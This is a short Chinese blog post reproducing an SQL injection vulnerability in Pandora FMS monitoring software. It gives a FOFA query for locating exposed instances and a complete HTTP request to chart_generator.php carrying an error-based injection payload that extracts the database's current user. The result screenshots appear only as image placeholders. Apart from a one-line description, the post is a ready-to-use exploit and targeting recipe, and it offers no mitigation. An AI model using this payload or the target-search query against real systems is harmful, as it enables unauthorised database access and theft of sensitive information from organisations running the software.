Babing
Published on 2024-08-30 / 2 Visits
0
0

P6-2PandoraFMS-监控软件-SQL

P6-2PandoraFMS-监控软件-SQL

漏洞描述:

Pandora FMS监控软件存在SQL注入漏洞,攻击者通过chart_generator.php 来执行恶意语句,获取数据库敏感信息。

网站图片:

image-20240625132513332

网络测绘:

fofa语法:

FOFA:app=“PANDORAFMS-产品”

漏洞复现:

payload:

GET /pandora_console/include/chart_generator.php?session_id=1'%20OR%20(SELECT%206562%20FROM(SELECT%20COUNT(*),CONCAT(0x7176767171,(SELECT%20MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR),0x20)),1,54)),0x71627a6a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20WIkG HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

效果图:
查询当前用户
image-20240619151202086
查询数据库版本
image-20240619151208545


Comment